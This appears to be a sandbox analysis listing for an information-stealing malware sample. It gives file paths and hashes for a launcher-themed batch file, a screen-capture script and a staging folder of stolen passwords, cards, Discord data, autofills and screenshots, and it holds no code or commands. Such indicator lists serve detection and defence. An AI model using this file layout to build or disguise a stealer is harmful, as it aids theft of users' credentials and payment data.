C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat

MD5 05ec53e2d2d9867bc93e34e694faec45
SHA1 221d09c47199869538f2b541afa736c03c8d9579
SHA256 ec3ea75321fd8f902276f09b944f01186137b1df0032cd0b19f1cb4772f3c55f
SHA512 a31b105c05b4414c299cfd937757514e293da2772b905a185da21817edf29e6e22c25ad196976a774ba8352550f8d4c1735dbf9a10074e384abfb912e54aa011

\??\c:\Users\Admin\AppData\Local\Temp\tqr0iaas\tqr0iaas.cmdline

MD5 ab2678028b4b5acc379ddf06c27edfe2
SHA1 3d5d97b4f1e023ba75e4b53419894de6b6c5481a
SHA256 8dee71b205d053ad7ee1d6fb1d7f6ff7e2c88c6d1834c88faba1ece9e71484a4
SHA512 2b131a281d58374abc44e7450c40da61044092ff9044e7a79ea77bb11ee643167b5b60ddaf5b5b2c49e9c348d7d8c5aee55e79a87721988b45f2d4ecb87bad0f

\??\c:\Users\Admin\AppData\Local\Temp\tqr0iaas\tqr0iaas.0.cs

MD5 b462a7b0998b386a2047c941506f7c1b
SHA1 61e8aa007164305a51fa2f1cebaf3f8e60a6a59f
SHA256 a81f86cd4d33ebbf2b725df6702b8f6b3c31627bf52eb1cadc1e40b1c0c2bb35
SHA512 eb41b838cc5726f4d1601d3c68d455203d3c23f17469b3c8cbdd552f479f14829856d699f310dec05fe7504a2ae511d0b7ffff6b66ceadb5a225efe3e2f3a020

\??\c:\Users\Admin\AppData\Local\Temp\tqr0iaas\CSC4E6C8135414A4B0683AD5297B3316BA.TMP

MD5 3d98006292c05aafbc193b92089bb574
SHA1 048af404a72526ef02a2a94a7ccf8cbdb3cf3e01
SHA256 90ab17faca327bb2927b60bd47f769b368debe86569c019d8cf5baf26813997c
SHA512 08f50f4a687ddc5994dba7f666a2f4c11e1dfc3024acca324f31bea5ff4bf29db4f609c3f6746c628b09606189d074b5e409e72dfda87043047372a377323a2c

C:\Users\Admin\AppData\Local\Temp\RES93B4.tmp

MD5 1ca7f72cdd1e421f17024115e07a9f3f
SHA1 5ae2075d60ce3345bc7ba0a99cb18dcc7728fa3d
SHA256 3f138ea24478bc40492f6060b95ebd61de0d4db1cc39fb7e0d6ae424d97e788e
SHA512 76a3873551bb53bbdef43ba3a886eaf8cbcacba6b0f1a21f63f859f06e942666227dec1170732e513c72c50fe25b38768f6e41f55e19c7eafebf7a855fd2d313

C:\Users\Admin\AppData\Local\Temp\tqr0iaas\tqr0iaas.dll

MD5 df35ffc67c8198139c15b37bfb0def7c
SHA1 f64cd45c07d665ac4e6e095903f644a1251ceb80
SHA256 c402621b6d2ed99339b161b4d62c0201c14a96453f45eea3512c5acc06f912f4
SHA512 e7a76f86b6b8b96c02acbfa0c6f3a4c361f238511470b40eebc40d24cf6b8effe2c413a3f8297c2e5cca51f767722b0bbbca5069a386d85823587dcc6f58553f

memory/940-207-0x000001DE02F60000-0x000001DE02F68000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 cbe5bd1c677a86e505e8afbba76d32d1
SHA1 6781b00d2efbb52232baa535484d0281b2341abc
SHA256 49cc9b9ddec232d1389a770220462e1d940567b9b945da92cfd5d0413d966571
SHA512 aeec87fd93836d8fdd7cf9f7890509f2ea896fe5447fd108bd31f28fc3a19f68c30b585bf8fe02faef8357753036474c7fbe2fa812581efc0a58d5e1c22a64d9

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4a7f03a7ad1cae046d8ceac04256e5ae
SHA1 ef0bf767c91cba32b33c0b48f74f5eb153ae43d3
SHA256 e8aa3162f519e3670b0fc79dfbeeca68ea2b65a17900cf3aafc6a48de3296d60
SHA512 382a91848be121734bce9f533bcb4747e5f21db5b1ea5dfc8cc567005f5be0f1dcc73a55516b83feb931cdc90601ed4d36fb890687f08e1056ff98da2365f01d

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0e0266e9b8595afad38e3aeeb7ac9e79
SHA1 d7f76538c8f2b58b6815fe7f4d3038d4d920a45f
SHA256 27bc56e8dd548d29e61b6b8654730b0b30f8d96c7f37ef5c204d4100ee297d43
SHA512 f6e294475d8c96792311bfc8b452a89ca7fb8fdcb127b04e773172f7df0d4e15b30bbd60c9cd6311e442d74a140411c860439afaaa968f05922c73599a0695a4

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 446dd1cf97eaba21cf14d03aebc79f27
SHA1 36e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256 a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512 a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

C:\ProgramData\Steam\Launcher\EN-Ngomewng\stolen_files.zip

MD5 76cdb2bad9582d23c1f6f4d868218d6c
SHA1 b04f3ee8f5e43fa3b162981b50bb72fe1acabb33
SHA256 8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85
SHA512 5e2f959f36b66df0580a94f384c5fc1ceeec4b2a3925f062d7b68f21758b86581ac2adcfdde73a171a28496e758ef1b23ca4951c05455cdae9357cc3b5a5825f

C:\ProgramData\Steam\Launcher\EN-Ngomewng\Serial-Check.txt

MD5 da9ff194886fd99e758d9ca908666e7b
SHA1 6de3fbe2aa5f32663a90576ade7fe2e6de78a7fc
SHA256 0648664f7a0211656e5afa131baa05d5244b86aa762c8a788f9a3b76bd9a6870
SHA512 549d7d0b945ab396e81055e66ddb1d0dafc309e7371c0a62801cc3625da36c9e4e162f3d005491236fbfbdf7df63c3f6bcbf942ec270385c190f1d1ef393f3c0

C:\ProgramData\Steam\Launcher\EN-Ngomewng\Passwords\Passwords.txt

MD5 c5e74f3120dbbd446a527e785dfe6d66
SHA1 11997c2a53d19fd20916e49411c7a61bfb590e9c
SHA256 e0fd13d912d320faaa64e177b4e75f54ec140692ebc5904d10e1cbe3e811ee05
SHA512 a2bab776d22abf857c7df84b3c90851829eda615fbd450c9c72ab89f97591224380990a86c8e7e40ac811aa1225592743eebed63125d519d138fa28b859f2a3f

C:\ProgramData\Steam\Launcher\EN-Ngomewng\Discord\discord.txt

MD5 675951f6d9d75fd2c9c06b5ff547c6fd
SHA1 9b474ab39d1e2aad52ea5272dbac7d4f9fe44c09
SHA256 60fe7843b40ed5b7c68118bbba6bfe5f786a76397cdedb80612fd7cefce7f244
SHA512 44dfb6c937283870c6eedf724649004a82631cd8eeb3f9c83e5bca619d1c9ffb8aa5f51c91d57f76789e2747712ce9c6ad207773928e5e00e712f640f8c25aea

C:\ProgramData\Steam\Launcher\EN-Ngomewng\debug.log

MD5 018a4ca87012f367b1d3b8c58ce5a8ed
SHA1 6812ae42fdf463564e060b88a6066ffcb3583102
SHA256 8ee69733b3ad621d5f4a8fff9100b3c8be00092d5efd2e4ced33d16b96a5f21c
SHA512 e418296946b2705acbcdc2dc85658f4a3c1fd2c74d53398b8ffc67625ea77d2bfc02fc305358d6ed04e7fa9222148b562238690fed451866efa8c0ad3cf9c4e7

C:\ProgramData\Steam\Launcher\EN-Ngomewng\Cards\Cards.txt

MD5 8a0ed121ee275936bf62b33f840db290
SHA1 898770c85b05670ab1450a96ea6fbd46e6310ef6
SHA256 983f823e85d9e4e6849a1ed58e5e3464f3a4adbe9d0daeeadd1416cf35178709
SHA512 7d429ce5c04a2e049cdf3f8d8165a989ab7e3e0ac25a7809c12c4168076492b797d2eebaf271ae02c51cb69786c2574ec3125166444e4fa6fc73430f75f8f154

C:\ProgramData\Steam\Launcher\EN-Ngomewng\Autofills\Autofills.txt

MD5 2f308e49fe62fbc51aa7a9b987a630fe
SHA1 1b9277da78babd9c5e248b66ba6ab16c77b97d0b
SHA256 d46a44dd86cea9187e6049fd56bb3b450c913756256b76b5253be9c3b043c521
SHA512 c3065baa302032012081480005f6871be27f26da758dc3b6e829ea8a3458e5c0a4740e408678f3ecf4600279d3fcad796f62f35b8591e46200ce896899573024

C:\ProgramData\Steam\Launcher\EN-Ngomewng.zip

MD5 0d48a4292c3d48db3ca75697ef99c794
SHA1 42c0f20cf57be70a5c67ab15be81651b65ae35d9
SHA256 565158ce8f4197490dce177667cc3b3b84511cef9bf3eecc68abc0a83be916e2
SHA512 19d5f5e06d9378dd5edee6e1b8de8cc2b7c0f8205a86bd3240da52c9dd16b7727a7aea19657ddf19add237d1e2ac82fbf96966a3d88b260be98aae7e0c1e01b4

C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1

MD5 621419f834750f90083d9b5f3583d7bb
SHA1 32ac4e8c4e775b1cd9c28d4ffead71f347e0dcfb
SHA256 86971f5c7efb01cb04ae067eb8068a6a2d52f9fd3ed3861464953f47e698254e
SHA512 ca9d2042b0bc78ff877f994a1f817c92284ac63951bd15b6164ef6636b6fc42d8d33d51fe5fd8ac7eff5b2f4e39b91a44939f7ea6a44c6ceb79e5adf65a65115

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8baa55f4c9614712ef2edb673b84f197
SHA1 f95f528a8dbff1c7c8abbc320633ad0ec097c902
SHA256 e2f3a14489a2526cb4341b9e7220531e1f46c861ea11d0a1ed17c901f6a1bee3
SHA512 899e33b413570a0a5008367e4286b675325635da89f5271c8b466ffd748c23066e96ec379532b2045c258114a9f3cbb202f32320b3769e414bb768119ec39cc3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5caad758326454b5788ec35315c4c304
SHA1 3aef8dba8042662a7fcf97e51047dc636b4d4724
SHA256 83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
SHA512 4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

C:\ProgramData\Steam\Launcher\EN-Ngomewng\Screenshots\Screenshot.png

MD5 a49da0880767ed802a3566423a8489f1
SHA1 2775ee90615720b2aa8fd36ab51e5bd279a7b414
SHA256 2eea278706f89c56083822507ede14c541670ee517870e64f6b05f2cded7fdc5
SHA512 4bd4acace6572214b11f0025c6bb62c0907a8cfab206a61f97850051f1cc4ee77da60b4cce15667b21c962081483edc12032c044cf642e9a8d2ed876045526c6

C:\ProgramData\Steam\Launcher\EN-NGO~1\debug.log

MD5 3038dece9944e3cd4243bb2cd7bbf04c
SHA1 87e48836d8776f1df3e229c220215aefaf47ac57
SHA256 228972970c9fe1bb7443a39b7daed7d70601ba61d9717fa66179ba67d1a6f892
SHA512 ff3dd72eba660023a4728a409e09bedf79f0800a40ca474bcec48149596dd64577e9ceddd1242ed2422b058cd5af812136b6556d51f5e2d3b389d1c32508f1a4